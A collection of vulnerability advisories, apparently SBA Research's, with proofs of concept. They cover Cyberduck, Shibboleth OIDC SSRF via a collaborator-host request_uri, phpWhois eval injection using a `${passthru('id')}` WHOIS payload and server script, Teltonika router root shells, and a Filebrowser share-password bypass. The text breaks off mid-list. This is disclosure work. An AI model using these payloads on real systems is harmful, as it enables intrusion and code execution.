a machine-in-the-middle attack on the TLS encrypted connection, resulting in
a total loss of confidentiality and integrity of the connection.

## Vulnerability Description ##

When permanently accepting an unknown TLS certificate for a specified
service, Cyberduck and Mountain Duck store the certificate fingerprint
in their own configuration file.
The certificate fingerprint is stored as SHA-1, which is considered weak.

## Proof of Concept ##

1. Set up a TLS encrypted *WebDAV* server, which uses a self-signed
   certificate (in this case at the IP address `10.42.42.1`).

2. Create a new connection to the server in Cyberduck or Mountain Duck.

3. The following certificate error is shown, since the self-signed
   certificate is not trusted:

   ![Certificate error](./images/Certificate%20Error.png)

   To always trust this certificate for this connection, `Always Trust`
   must be checked before clicking `Continue`.

4. Afterwards the following dialog shows up, asking if you want to install
   the certificate:

   ![Security warning](./images/Security%20Warning.png)

   By clicking `No` the mounting process gets canceled; therefore, to
   continue, clicking `Yes` is required.

5. Now, the fingerprint of the certificate is stored in the configuration
   file of the application:

   Cyberduck (`C:\Users\\AppData\Roaming\Cyberduck\Cyberduck.user.config`):

   ```xml
   False

   [...]
   ```

   Mountain Duck (`C:\Users\\AppData\Roaming\Cyberduck\Mountain Duck.user.config`):

   ```xml
   False
   ```

The application stores the SHA-1 certificate fingerprint, although SHA-1 is
considered weak. An attacker could provoke a hash collision and thus perform
a machine-in-the-middle attack on the TLS encrypted connection, resulting in
a total loss of confidentiality and integrity of the connection.

## Recommended Countermeasures ##

We recommend updating to Cyberduck version 9.1.7 / Mountain Duck version
4.17.6 or later, which applies the following countermeasure.

When permanently accepting a TLS certificate for a specific service, the
application should store the certificate fingerprint using a modern hashing
algorithm, such as SHA-256 or SHA-512.

## Timeline ##

* `2025-03-25` Identified the vulnerability in Cyberduck version 9.1.3
  and Mountain Duck version 4.17.3
* `2025-03-27` Initial contact attempt and disclosure of vulnerability to
  iterate GmbH via GitHub Security Advisory
* `2025-04-09` Vendor accepted this report
* `2025-06-20` Vendor created a private fork to address the problem
* `2025-06-23` Vendor merged the patch to main
* `2025-06-24` Vendor released Cyberduck 9.1.7 / Mountain Duck 4.17.6
* `2025-06-24` Public disclosure via GHSA
* `2025-06-25` SBA Research assigned CVE-2025-41256
* `2025-06-25` Public disclosure via CVE

## References ##

* GitHub Security Advisory.
  Cyberduck and Mountain Duck - Weak Hash Algorithm for Certificate Fingerprint:

## Credits ##

* Andreas Boll ([SBA Research](https://www.sba-research.org/))
* Thomas Kostal ([SBA Research](https://www.sba-research.org/))

--------------------------------------------------------------------------------
/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF/README.md:
--------------------------------------------------------------------------------

# Shibboleth Identity Provider OIDC OP Plugin Server-Side Request Forgery #

## Vulnerability Overview ##

Shibboleth Identity Provider OIDC OP plugin 3.0.3 or below is prone to a
server-side request forgery (SSRF) vulnerability due to an insufficient
restriction of the `request_uri` parameter. This allows unauthenticated
attackers to interact with arbitrary third-party HTTP services.

* **Identifier** : SBA-ADV-20220127-01
* **Type of Vulnerability** : Server-Side Request Forgery (SSRF)
* **Software/Product Name** : [Identity Provider OIDC OP Plugin](https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP)
* **Vendor** : Shibboleth Consortium
* **Affected Versions** : <= 3.0.3
* **Fixed in Version** : 3.0.4
* **CVE ID** : CVE-2022-24129
* **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
* **CVSS Base Score** : 8.6 (High)

## Vendor Description ##

> The OIDC OP plugin is the successor to the original GEANT-funded add-on to
> Shibboleth and is now available as an officially-supported plugin for IdP
> V4.1 and above. It provides conformant OIDC OP functionality alongside the
> SAML and CAS support previously native to the IdP software.

Source:

## Impact ##

An unauthenticated attacker can interact with arbitrary third-party HTTP
services by exploiting the vulnerability documented in this advisory.
This might lead to manipulation of internal services accessible by the
server running the affected software. Moreover, an attacker can send
malicious requests to external services, while the server running the
affected software appears as the source of the attack.

## Vulnerability Description ##

The OIDC specification allows an OIDC RP to send authentication requests via
a request object. These request objects can either be sent directly as the
`request` parameter or indirectly by passing a URL as the `request_uri`
parameter. In the latter case, the OIDC provider fetches the request
object via an HTTP GET request from the specified URL.

The Shibboleth OIDC OP plugin supports this behavior, but does not validate
the passed `request_uri` before issuing the HTTP GET request.
An unauthenticated attacker might exploit this to perform server-side
request forgery and issue malicious HTTP GET requests to services reachable
by the server running the plugin. For example, an attacker could try to
access protected internal services which are otherwise not reachable from
public or adjacent networks.

The Shibboleth OIDC OP plugin does not return information from the issued
HTTP response to the attacker when it cannot parse the response as a JWS.
Therefore, the ability of an attacker is mostly limited to initiating
operations on HTTP services.
Additionally, an attacker can find out the exact Shibboleth IdP version by
letting the OIDC OP plugin connect to an attacker-controlled service and
inspecting the user agent header of the HTTP request.

## Proof of Concept ##

We set up a Shibboleth IdP version 4.1.5 with the OIDC OP plugin 3.0.3
and deployed the following client metadata.
66 | 67 | ```json 68 | [ 69 | { 70 | "scope":"openid email", 71 | "redirect_uris":["https://demorp.example.org/redirect_uri"], 72 | "client_id":"demo_rp", 73 | "client_secret":"topsecret", 74 | "response_types":["code"], 75 | "grant_types":["authorization_code"], 76 | "request_uris":["https://example.org"] 77 | } 78 | ] 79 | ``` 80 | 81 | In the client metadata we first specified no `request_uris` parameter. We 82 | then also tried to set the `request_uris` parameter to `https://example.org` 83 | (see above), both leading to the following behavior. 84 | 85 | We issued an authentication request via the following URL specifying an 86 | `request_uri` parameter pointing to an attacker-controlled server: 87 | 88 | ```plain 89 | https://idp.example.org/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://na1wjvvodi7fua6a3ulaxtq48vel2a.burpcollaborator.net 90 | ``` 91 | 92 | On the attacker-controlled server we received the following request: 93 | 94 | ```http 95 | GET / HTTP/1.1 96 | Host: na1wjvvodi7fua6a3ulaxtq48vel2a.burpcollaborator.net 97 | Connection: Keep-Alive 98 | User-Agent: ShibbolethIdp/4.1.5 OpenSAML/4.1.1 99 | Accept-Encoding: gzip,deflate 100 | Connection: close 101 | ``` 102 | 103 | Additionally, the Shibboleth IdP logged the following output: 104 | 105 | ```plain 106 | 2022-01-28 20:22:58,290 - 127.0.0.1 - ERROR [net.shibboleth.idp.plugin.oidc.op.profile.impl.SetRequestObjectToResponseContext:144] - Profile Action SetRequestObjectToResponseContext: Unable to parse request object from request_uri, Invalid JWT serialization: Missing dot delimiter(s) 107 | ``` 108 | 109 | This indicates that the OIDC OP plugin sent the HTTP request, but could not 110 | parse the HTTP response. 
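The allow-list check that the countermeasures section below recommends, written out as an added Python model that is not the plugin's code; the client identifiers, registered URIs and the `CLIENTS` table are constructed for the example:

```python
"""Allow-list check for the OIDC request_uri parameter.

Added example, not code from the Shibboleth OIDC OP plugin. It models the
countermeasure from this advisory: a request object is fetched only when the
client's registered metadata carries a request_uris allow list and the value
supplied in the authentication request matches one of its entries exactly.
All client identifiers and URIs below are constructed for the example.
"""
from urllib.parse import urlsplit

# Constructed client metadata in the shape of the proof-of-concept registration.
CLIENTS = {
    "demo_rp": {
        "redirect_uris": ["https://demorp.example.org/redirect_uri"],
        "request_uris": ["https://demorp.example.org/request.jwt"],
    },
    # Registered without an allow list: request_uri must be refused outright.
    "legacy_rp": {
        "redirect_uris": ["https://legacy.example.org/cb"],
    },
}


class RequestUriRejected(Exception):
    """The supplied request_uri must not be fetched."""


def validate_request_uri(client_id, request_uri):
    """Return request_uri if the OP may fetch it, else raise RequestUriRejected.

    The comparison is an exact string match against the registered entries,
    so no caller-chosen scheme, host, port or path ever reaches the HTTP
    client. A prefix or host-only match would be weaker, because the rest of
    the URL would still be chosen by whoever sends the authentication request.
    """
    client = CLIENTS.get(client_id)
    if client is None:
        raise RequestUriRejected("unknown client")
    allowed = client.get("request_uris")
    if not allowed:
        raise RequestUriRejected("client has no registered request_uris")
    if urlsplit(request_uri).scheme != "https":
        raise RequestUriRejected("request_uri must use https")
    if request_uri not in allowed:
        raise RequestUriRejected("request_uri is not registered for this client")
    return request_uri


def is_request_uri_allowed(client_id, request_uri):
    """Boolean form of validate_request_uri for callers that only need a verdict."""
    try:
        validate_request_uri(client_id, request_uri)
        return True
    except RequestUriRejected:
        return False


def register_client_dynamically(client_id, metadata):
    """Second recommendation of the advisory: a client that registers itself via
    the dynamic registration endpoint cannot bring its own allow list. Any
    request_uris it submits are dropped; an administrator has to add them to
    the static configuration instead."""
    cleaned = {key: value for key, value in metadata.items() if key != "request_uris"}
    CLIENTS[client_id] = cleaned
    return cleaned


if __name__ == "__main__":
    # Shape of the proof-of-concept request: a registered client, a foreign URI.
    print(is_request_uri_allowed("demo_rp", "https://internal.example.org/admin"))  # False
    print(is_request_uri_allowed("demo_rp", "https://demorp.example.org/request.jwt"))  # True
```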

## Recommended Countermeasures ##

As a countermeasure for the vendor we recommend only accepting the
`request_uri` parameter when an allow list is configured in the client
metadata and the supplied `request_uri` matches the client metadata.
Additionally, the allow list should not be arbitrarily configurable via
the dynamic client-registration endpoint.

According to the vendor this countermeasure was implemented in version 3.0.4;
we therefore recommend that users upgrade to version 3.0.4 or later.

## Timeline ##

* `2022-01-27`: identification of vulnerability in version 3.0.3
* `2022-01-27`: initial vendor contact
* `2022-01-27`: disclosed vulnerability to vendor security contact
* `2022-01-28`: vendor acknowledged vulnerability
* `2022-01-29`: request CVE from MITRE
* `2022-01-30`: MITRE assigned CVE-2022-24129
* `2022-01-31`: vendor released version 3.0.4
* `2022-01-31`: public disclosure

## References ##

* OpenID Connect specification:
* Vendor security advisory:

## Credits ##

* David Gnedt ([SBA Research](https://www.sba-research.org/))
* Andreas Bernauer-Puchegger ([SBA Research](https://www.sba-research.org/))
* Franz Wieshaider ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2018/SBA-ADV-20180425-01_phpWhois_Code_Execution/README.md:
--------------------------------------------------------------------------------
# phpWhois PHP Code Injection #

## Vulnerability Overview ##

phpWhois and some of its forks in versions before 5.1.0 are prone to a
code injection vulnerability due to insufficient sanitization of returned
WHOIS data. This allows attackers controlling the WHOIS information of a
requested domain to execute arbitrary PHP code in the context of the
application.

* **Identifier** : SBA-ADV-20180425-01
* **Type of Vulnerability** : Code Injection
* **Software/Product Name** : phpWhois
* **Vendor** : [phpwhois.org](http://www.phpwhois.org/),
  [abcdmitry](https://github.com/phpWhois/phpWhois),
  [jsmitty12](https://github.com/jsmitty12/phpWhois),
  [webalternative](https://github.com/webalternative/phpWhois)
  and others
* **Affected Versions** : phpwhois.org: 4.2.2 and probably prior,
  as well as the following forks
  abcdmitry: 4.2.5 and probably prior,
  jsmitty12: 5.0.2 and probably prior
* **Fixed in Version** : jsmitty12: 5.1.0
* **CVE ID** : CVE-2015-5243
* **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
* **CVSSv3 Base Score** : 9.8 (Critical)

## Vendor Description ##

> This package contains a Whois (RFC954) library for PHP. It allows a
> PHP program to create a Whois object, and obtain the output of a
> whois query with the lookup function.

Source:

## Impact ##

By exploiting the vulnerability documented in this advisory, an
attacker controlling the WHOIS information of a domain retrieved via
phpWhois can execute arbitrary PHP code in the context of the
application. The set of domains enabling this attack vector is limited
to certain top-level domains. Sensitive data accessible by the
application might get exposed through this attack.

The vulnerability is fixed in version 5.1.0 or newer of jsmitty12's fork.
We recommend upgrading to this version.

## Vulnerability Description ##

phpWhois implements multiple generic parsers for WHOIS data in
`whois.parser.php`. The parser implemented in function
`generic_parser_b` is vulnerable to injection of PHP code.

The function `generic_parser_b` builds a PHP statement from WHOIS data
values by concatenating strings without proper sanitization. It then
passes the statement to the `eval` function:

```php
function generic_parser_b($rawdata, $items = array(), $dateformat = 'mdy', $hasreg = true, $scanall = false) {
    [...]
    foreach ($rawdata as $val) {
        if (trim($val) != '') {
            if (($val[0] == '%' || $val[0] == '#') && $disok) {
                $r['disclaimer'][] = trim(substr($val, 1));
                $disok = true;
                continue;
            }
            $disok = false;
            reset($items);
            foreach ($items as $match => $field) {
                $pos = strpos($val, $match);
                if ($pos !== false) {
                    if ($field != '') {
                        $var = '$r' . getvarname($field);
                        $itm = trim(substr($val, $pos + strlen($match)));
                        if ($itm != '')
                            eval($var . '="' . str_replace('"', '\"', $itm) . '";');
                    }
                    if (!$scanall)
                        break;
                }
            }
        }
    [...]
}
```

At least the following 33 top-level domain handlers make use of the
vulnerable parser:

```text
ae, aero, ag, asia, au, bh, biz, cat, cn, co, co.za, fi, hu, in, info, jp, lu, me, mobi, museum, name, nz, org, pro, ru, sc, se, su, tel, travel, us, ws, xxx
```

## Proof-of-Concept ##

An attacker can exploit this vulnerability by setting malicious WHOIS
information such as `Registrant Name: ${passthru('id')}` for an arbitrary
`.org` domain.
Instead of a real name, we specify `${passthru('id')}`, which PHP
interprets as a variable expansion inside double-quoted string literals.
We simulate this situation via a simple WHOIS server implementation:

```py
import SocketServer

DATA = "Registrant Name: ${passthru('id')}\n"

class WhoisHandler(SocketServer.BaseRequestHandler):
    def handle(self):
        self.request.recv(1024)
        print('Request received')
        self.request.sendall(DATA)
        print('Payload sent')

if __name__ == '__main__':
    SocketServer.ThreadingTCPServer.allow_reuse_address = True
    server = SocketServer.ThreadingTCPServer(('127.0.0.1', 9999), WhoisHandler)
    server.serve_forever()
```

The following example sets up phpWhois to use the simulated WHOIS
server and requests information for `example.org`:

```php
<?php
[...]
$whois->useServer('org', '127.0.0.1:9999');
echo $whois->lookup('example.org');
```

Therefore, the vulnerable phpWhois version executes the injected PHP
statement `passthru('id')`, which executes the Unix `id` command on the
server and returns its output.
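The same matching logic written so that values stay data, as an added Python example that is not phpWhois code; the item table and the WHOIS reply are constructed, and the reply contains the advisory's `${passthru('id')}` value to show it is stored as an inert string:

```python
"""Data-only port of phpWhois's generic_parser_b matching logic.

Added example, not phpWhois code. The PHP parser above turns every matched
value into a PHP assignment statement and passes it to eval(), which is why a
value such as ${passthru('id')} is interpolated as code. This port keeps the
same matching rules (an ordered "line prefix -> field path" table, leading
%/# disclaimer lines, optional scan-all) but writes values straight into a
dict, so the same payload ends up as an inert string. The item table and
the WHOIS reply are constructed for the example.
"""

# Constructed item table in the shape phpWhois hands to the parser.
# A trailing '.' on the field path marks a repeatable (list) field.
ITEMS = {
    "Domain Name:": "regrinfo.domain.name",
    "Registrant Name:": "regrinfo.owner.name",
    "Registrant Email:": "regrinfo.owner.email",
    "Name Server:": "regrinfo.domain.nserver.",
    "Updated Date:": "regrinfo.domain.changed",
}

# Constructed reply; the third line carries the advisory's proof-of-concept value.
SAMPLE_REPLY = [
    "% Constructed WHOIS reply for this example",
    "Domain Name: EXAMPLE.ORG",
    "Registrant Name: ${passthru('id')}",
    "Registrant Email: hostmaster@example.org",
    "Name Server: ns1.example.org",
    "Name Server: ns2.example.org",
    "# a comment after the data block is not a disclaimer",
]


def _assign(result, path, value):
    """Create the nested dicts named by a dotted path and store value there.
    phpWhois did this via eval('$r[...]="..."'); here the value is data only."""
    is_list = path.endswith(".")
    parts = path.strip(".").split(".")
    node = result
    for key in parts[:-1]:
        node = node.setdefault(key, {})
    if is_list:
        node.setdefault(parts[-1], []).append(value)
    else:
        node[parts[-1]] = value


def generic_parser_b(rawdata, items=ITEMS, scanall=False):
    """Parse WHOIS lines into a nested dict, mirroring the PHP control flow."""
    result = {"disclaimer": []}
    # Disclaimer lines count only before the first data line, as in the PHP
    # version (its initialisation of $disok is hidden in the elided part).
    disok = True
    for line in rawdata:
        val = line.rstrip("\r\n")
        if val.strip() == "":
            continue
        if val[0] in "%#" and disok:
            result["disclaimer"].append(val[1:].strip())
            continue
        disok = False
        for match, field in items.items():
            pos = val.find(match)
            if pos == -1:
                continue
            if field:
                itm = val[pos + len(match):].strip()
                if itm:
                    _assign(result, field, itm)
            if not scanall:
                break
    return result


if __name__ == "__main__":
    import json
    print(json.dumps(generic_parser_b(SAMPLE_REPLY), indent=2))
```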

## Timeline ##

* `2018-04-25`: identification of vulnerability
* `2018-04-26`: initial contact of several phpWhois and fork maintainers
* `2018-04-26`: disclosed vulnerability to phpwhois.org project maintainer
* `2018-04-27`: disclosed vulnerability to jsmitty12
* `2018-04-30`: phpwhois.org project maintainer stated that it is a
  known issue (CVE-2015-5243) with a fix committed at

* `2018-04-30`: fix is not released yet and MITRE lists CVE-2015-5243
  as assigned but private
* `2018-05-29`: jsmitty12 released fixed version 5.1.0
* `2018-08-01`: public disclosure

## References ##

* Original advisory:
* Fixes:
  *
  *
  *

## Credits ##

* Original advisory by Iain Wallace ([Nettitude](https://www.nettitude.com/))
* Rediscovered by David Gnedt ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2018/SBA-ADV-20180319-02_Teltonika_Incorrect_Access_Control/README.md:
--------------------------------------------------------------------------------
# Teltonika RUT9XX Missing Access Control to UART Root Terminal #

## Vulnerability Overview ##

Teltonika RUT9XX routers with firmware before 00.04.233 provide a root
terminal on a serial interface without proper access control. This
allows attackers with physical access to execute arbitrary commands
with root privileges.

* **Identifier** : SBA-ADV-20180319-02
* **Type of Vulnerability** : Incorrect Access Control
* **Software/Product Name** : [Teltonika RUT955](https://teltonika.lt/product/rut955/)
* **Vendor** : [Teltonika](https://teltonika.lt/)
* **Affected Versions** : Firmware RUT9XX_R_00.04.199 and probably prior,
  newer firmware versions if settings were not cleared
* **Fixed in Version** : RUT9XX_R_00.04.233
* **CVE ID** : CVE-2018-17534
* **CVSSv3 Vector** : CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
* **CVSSv3 Base Score** : 6.8 (Medium)

## Vendor Description ##

> RUT955 is a highly reliable and secure LTE router with I/O, GNSS and
> RS232/RS485 for professional applications. Router delivers high
> performance, mission-critical cellular communication and GPS location
> capabilities.

Source:

## Impact ##

An attacker with physical access can fully compromise the device by
exploiting the vulnerability documented in this advisory. Sensitive
data stored or transmitted via the device might get exposed through
this attack.

We recommend upgrading to version RUT9XX_R_00.04.233 or newer, which
includes fixes for the vulnerability described in this advisory.
It is important to clear all settings during upgrade, for example, by
disabling the "Keep all settings" checkbox while upgrading via the
web interface. Otherwise, newer firmware versions remain vulnerable.

## Vulnerability Description ##

RUT9XX routers provide a UART/serial interface on two pins of an
internal card-edge connector.

* RX: Pin 1 - Rectangle-like pin on the top-side (CPU side)
* TX: Pin 8 - Rectangle-like pin on the bottom-side

The UART interface uses TTL level and a baud rate of 115200. It
provides log output and a root terminal without proper access control.

## Proof-of-Concept ##

Our test device with firmware RUT9XX_R_00.04.172 provided the following
log output during boot and after hitting the ENTER key:

```text
***************************************
*       U-Boot 3.0.1 2017-02-15       *
***************************************

BOARD:  Teltonika RUT9XX
RAM:    128 MB DDR2 32-bit CL3-4-4-10
FLASH:  16 MB Winbond W25Q128
CLOCKS: CPU/RAM/AHB/SPI/REF
        550/400/200/ 25/ 40 MHz

Hit any key to stop booting: 0

Booting image from 0x9F040000...

   Vendor/image name: Teltonika RUT9xx
   Hardware ID:       0x35000001
   Whole image size:  15.5 MB (16252928 bytes)
   Kernel size:       1.1 MB (1191732 bytes)
   Rootfs size:       9.7 MB (10170504 bytes)
   Kernel load address: 0x80060000
   Kernel entry point:  0x80060000

Header CRC... skipped
Data CRC... skipped

Stopping network... OK!
Uncompressing Kernel... OK!
Starting kernel...

[    0.000000] Linux version 3.18.44 (simonas@Teltonika-I3) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 r40569) ) #1 Tue Apr 10 15:23:49 EEST 2018
[    0.000000] bootconsole [early0] enabled
[    0.000000] CPU0 revision is: 0001974c (MIPS 74Kc)
[    0.000000] SoC: Atheros AR9344 rev 3
[    0.000000] Determined physical RAM map:
[    0.000000]  memory: 08000000 @ 00000000 (usable)
procd: Console is alive
procd: - watchdog -
procd: - preinit -
procd: - early -
procd: - watchdog -
procd: - ubus -
procd: - init -
Please press Enter to activate this console.
[   20.140000] usb 1-1.3: new high-speed USB device number 4 using ehci-platform
[   20.280000] option 1-1.3:1.0: GSM modem (1-port) converter detected
[   20.280000] usb 1-1.3: GSM modem (1-port) converter now attached to ttyUSB1
[   20.290000] option 1-1.3:1.1: GSM modem (1-port) converter detected
[   20.300000] usb 1-1.3: GSM modem (1-port) converter now attached to ttyUSB2
[   20.310000] option 1-1.3:1.2: GSM modem (1-port) converter detected
[   20.310000] usb 1-1.3: GSM modem (1-port) converter now attached to ttyUSB3
[   20.320000] option 1-1.3:1.3: GSM modem (1-port) converter detected
[   20.330000] usb 1-1.3: GSM modem (1-port) converter now attached to ttyUSB4
[   20.360000] qmi_wwan 1-1.3:1.4: cdc-wdm0: USB WDM device
[   20.360000] qmi_wwan 1-1.3:1.4: Quectel EC21&EC25&EC20 R2.0 work on RawIP mode
[   20.370000] qmi_wwan 1-1.3:1.4 wwan0: register 'qmi_wwan' at usb-ehci-platform-1.3, WWAN/QMI device, xx:xx:xx:xx:xx:xx
[   22.280000] jffs2: notice: (1498) jffs2_build_xattr_subsystem: complete building xattr subsystem, 0 of xdatum (0 unchecked, 0 orphan) and 0 of xref (0 dead, 0 orphan) found.
[   26.220000] device eth0 entered promiscuous mode
[   28.520000] eth0: link up (1000Mbps/Full duplex)
[   28.520000] br-lan: port 1(eth0) entered forwarding state
[   28.530000] br-lan: port 1(eth0) entered forwarding state
[   30.530000] br-lan: port 1(eth0) entered forwarding state
[   33.220000] Ports leds ON
procd: - init complete -



BusyBox v1.24.2 () built-in shell (ash)

  ____        _    ___  ____   _(_)_
 |  _ \ _   _| |_ / _ \/ ___| (_)@(_)
 | |_) | | | | __| | | \___ \  /(_)
 |  _ <| |_| | |_| |_| |___) |  \|/
 |_| \_\\__,_|\__|\___/|____/   \|/

 Teltonika RUT9XX 2014 - 2018

root@router:/# id
uid=0(root) gid=0(root)
root@router:/#
```

## Timeline ##

* `2018-03-19` identification of vulnerability in version RUT9XX_R_00.04.84
* `2018-04-10` re-test of version RUT9XX_R_00.04.161
* `2018-04-16` re-test of version RUT9XX_R_00.04.172
* `2018-04-16` initial vendor contact through public address
* `2018-04-18` vendor response with security contact
* `2018-04-19` disclosed vulnerability to vendor security contact
* `2018-04-26` vendor released fix in version RUT9XX_R_00.04.233
* `2018-07-09` notify vendor about incomplete fix
* `2018-07-25` notify vendor about incomplete fix
* `2018-09-25` request CVE from MITRE
* `2018-09-26` MITRE assigned CVE-2018-17534
* `2018-09-26` notify vendor about incomplete fix
* `2018-10-03` vendor stated that clearing of settings is required
* `2018-10-10` re-test of version RUT9XX_R_00.04.233
* `2018-10-11` public disclosure

## References ##

* Firmware Changelog:

## Credits ##

* David Gnedt ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250327-02_Filebrowser_Password_Protection_Of_Links_Bypassable/README.md:
--------------------------------------------------------------------------------
# Filebrowser Password Protection of Links Bypassable #

## Vulnerability Overview ##

Files managed by Filebrowser can be shared with a link to external
persons. While the application allows protecting those links with a password,
the implementation is error-prone, making accidental unprotected sharing
of a file possible.

* **Identifier** : SBA-ADV-20250327-02
* **Type of Vulnerability** : Authentication Bypass
* **Software/Product Name** : [Filebrowser](https://filebrowser.org/)
* **Vendor** : [Filebrowser](https://github.com/filebrowser)
* **Affected Versions** : <= 2.34.2
* **Fixed in Version** : Not yet
* **CVE ID** : CVE-2025-52996
* **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
* **CVSS Base Score** : 3.1 (Low)

## Vendor Description ##

> filebrowser provides a file managing interface within a specified directory
> and it can be used to upload, delete, preview, rename and edit your files.
> It allows the creation of multiple users and each user can have its own
> directory. It can be used as a standalone app.

Source:

## Impact ##

File owners might assume that their shared files are only
accessible to persons knowing the defined password, giving them a false sense
of security. Meanwhile, attackers gaining access to the unprotected link can
use this information alone to download the possibly sensitive file.

## Vulnerability Description ##

When sharing a file, the user is presented with a dialog asking for an
optional password to protect the file share. The user's assumption at
this point would be that the shared file won't be accessible without
knowledge of the password. After clicking on `SHARE` the following dialog
opens, allowing the file's owner to copy the share link:

![Dialog when sharing a file](images/filebrowser_sharedialog.png)

In fact, there is not one, but two links offered: a `Download Link` and an
unnamed second one. They have the following format:

* `http://filebrowser.local:8080/share/6Gtw0xAw`
* `http://filebrowser.local:8080/api/public/dl/6Gtw0xAw/dummy1.pdf?token=voDK6j[...]`

Apparently, the first of the two share links is the one that users are
supposed to actually share, while the second one is a direct download link
not protected by the password. This behavior is not documented anywhere or
explained in the GUI, though.

There are multiple scenarios in which an attacker might gain access to the
unprotected link and, in consequence, to the shared file:

* The file owner might accidentally share the second link instead of the
  first one, making it accessible to anyone having read access to the
  messaging system used (e.g., a mail server).
* After the legitimate receiver of the share has used the password, the
  unprotected link will get logged in multiple locations like the browser
  history or the log of a proxy server used.

## Proof of Concept ##

Using the first link results in an authorization error if no password is
provided, as expected:

```http hl:5
GET /api/public/share/6Gtw0xAw HTTP/1.1
Host: filebrowser.local:8080
Referer: http://filebrowser.local:8080/share/6Gtw0xAw
X-Auth:
X-SHARE-PASSWORD:
[...]

HTTP/1.1 401 Unauthorized
Cache-Control: no-cache, no-store, must-revalidate
Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline';
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Thu, 27 Mar 2025 10:59:12 GMT
Content-Length: 17

401 Unauthorized
```

Only if the password is provided (via the `X-SHARE-PASSWORD` header) is a
proper response given:

```http hl:5
GET /api/public/share/6Gtw0xAw HTTP/1.1
Host: filebrowser.local:8080
Referer: http://filebrowser.local:8080/share/6Gtw0xAw
X-Auth:
X-SHARE-PASSWORD: 1234
[...]

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline';
Content-Type: application/json; charset=utf-8
Date: Thu, 27 Mar 2025 10:59:15 GMT
Content-Length: 301

{"path":"","name":"dummy1.pdf","size":7703,"extension":".pdf","modified":"2025-03-27T15:11:45.101242449Z","mode":420,"isDir":false,"isSymlink":false,"type":"pdf","token":"voDK6j[...]"}
```

But it does not return the actual file content; rather, it returns an access
token. This is the very same token that is already part of the second share
URL and is used by the web application to recreate the actual download URL.
If you are in possession of that token, no further password check is
performed, and the content of the file is returned:

```http
GET /api/public/dl/6Gtw0xAw?inline=true&token=voDK6j[...] HTTP/1.1
Host: filebrowser.local:8080
Referer: http://filebrowser.local:8080/share/6Gtw0xAw
[...]

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: private
Content-Disposition: inline
Content-Length: 7703
Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline';
Content-Security-Policy: script-src 'none';
Content-Type: application/pdf
Last-Modified: Mon, 03 Mar 2025 15:11:45 GMT
Date: Thu, 27 Mar 2025 10:59:18 GMT

%PDF-1.4
%Ç쏢
%%Invocation: path/gs -P- -dSAFER -dCompatibilityLevel=1.4 -q -P- -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sstdout=? -sOutputFile=? -P- -dSAFER -dCompatibilityLevel=1.4 -
5 0 obj
[...]
```

## Recommended Countermeasures ##

A short-term solution would be to simply remove the second link from the GUI
when a password-protected share is created. Doing so will be a proper defense
against user errors, but it will still leave unprotected links in various
logs. A thorough fix has to eliminate the unprotected links completely:
access to the file must only be given to requests containing the share
password.

## Timeline ##

* `2025-03-27` Identified the vulnerability in version 2.32.0
* `2025-04-11` Contacted the project
* `2025-04-29` Vulnerability disclosed to the project
* `2025-06-25` Uploaded advisories to the project's GitHub repository
* `2025-06-26` CVE ID assigned by GitHub
* `2025-06-29` Partial fix released with version 2.34.2 (passwordless link
  not shown anymore); GitHub issue #5239 opened to track the remaining fix
* `2025-06-29` Advisory published by project as `GHSA-3v48-283x-f2w4`

## References ##

* CWE-305: Authentication Bypass by Primary Weakness:
* GitHub Security Advisory:
* GitHub Issue:

## Credits ##

* Mathias Tausig ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2018/SBA-ADV-20180319-01_Teltonika_OS_Command_Injection/README.md:
--------------------------------------------------------------------------------
# Teltonika RUT9XX Unauthenticated OS Command Injection #

## Vulnerability Overview ##

Teltonika RUT9XX routers with firmware before 00.04.233 are prone to
multiple unauthenticated OS command injection vulnerabilities in
`autologin.cgi` and `hotspotlogin.cgi` due to insufficient user input
sanitization. This allows remote attackers to execute arbitrary
commands with root privileges.

* **Identifier** : SBA-ADV-20180319-01
* **Type of Vulnerability** : OS Command Injection
* **Software/Product Name** : [Teltonika RUT955](https://teltonika.lt/product/rut955/)
* **Vendor** : [Teltonika](https://teltonika.lt/)
* **Affected Versions** : Firmware RUT9XX_R_00.04.172 and probably prior
* **Fixed in Version** : RUT9XX_R_00.04.233
* **CVE ID** : CVE-2018-17532
* **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
* **CVSSv3 Base Score** : 9.8 (Critical)

## Vendor Description ##

> RUT955 is a highly reliable and secure LTE router with I/O, GNSS and
> RS232/RS485 for professional applications. Router delivers high
> performance, mission-critical cellular communication and GPS location
> capabilities.

Source:

## Impact ##

An attacker can fully compromise the device by exploiting the
vulnerabilities documented in this advisory. Sensitive data stored or
transmitted via the device might get exposed through this attack.

We recommend upgrading to version RUT9XX_R_00.04.233 or newer, which
includes fixes for the vulnerabilities described in this advisory.

## Vulnerability Description ##

Several parameters of the scripts `autologin.cgi` and `hotspotlogin.cgi`
are affected by OS command injection vulnerabilities. The scripts are
part of the coova-chilli captive portal. However, the vulnerabilities
are exploitable regardless of the device configuration, even if no
captive portal is configured.

More concretely, the following parameters are vulnerable:

* `/cgi-bin/autologin.cgi`
  * reply
  * uamport
  * challenge
  * userurl
  * res
  * reason
  * *If* res=success
